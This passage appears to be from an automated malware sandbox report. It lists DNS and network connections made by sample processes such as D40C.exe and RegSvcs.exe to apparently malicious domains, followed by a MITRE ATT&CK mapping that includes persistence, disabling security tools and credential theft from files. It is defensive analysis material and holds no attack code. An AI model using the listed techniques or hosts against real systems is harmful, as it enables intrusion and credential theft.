DNS Response

142.251.36.14
142.251.36.14:443

play.google.com

https

msedge.exe

9.7kB
10.5kB
26
32
8.8.8.8:53

35.231.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.231.240.157.in-addr.arpa
8.8.8.8:53

14.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

14.36.251.142.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.231.35
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

146 B
266 B
2
2

DNS Request

222.70.216.185.in-addr.arpa

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

D40C.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.67.143

104.20.68.143
8.8.8.8:53

tak.soydet.top

dns

D40C.exe

60 B
76 B
1
1

DNS Request

tak.soydet.top

DNS Response

95.217.246.182
8.8.8.8:53

171.176.209.85.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

171.176.209.85.in-addr.arpa
8.8.8.8:53

170.34.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

170.34.67.172.in-addr.arpa
8.8.8.8:53

182.246.217.95.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

182.246.217.95.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

DA47.exe

110 B
290 B
2
2

DNS Request

api.ip.sb

DNS Request

api.ip.sb

DNS Response

104.26.13.31

104.26.12.31

172.67.75.172

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

31.13.26.104.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

31.13.26.104.in-addr.arpa

DNS Request

31.13.26.104.in-addr.arpa
142.250.179.141:443

accounts.google.com

https

msedge.exe

3.9kB
3.9kB
8
8
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

132 B
196 B
2
2

DNS Request

bytecloudasa.website

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39

DNS Response

172.67.212.39

104.21.61.162
8.8.8.8:53

162.61.21.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

162.61.21.104.in-addr.arpa

DNS Request

162.61.21.104.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

130 B
276 B
2
2

DNS Request

host-file-host6.com

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

194.169.175.127
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

148 B
270 B
2
2

DNS Request

127.175.169.194.in-addr.arpa

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

f122b745-a3e3-4679-956b-c3d53ceb1cf2.uuid.cdntokiog.studio

dns

104 B
163 B
1
1

DNS Request

f122b745-a3e3-4679-956b-c3d53ceb1cf2.uuid.cdntokiog.studio

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery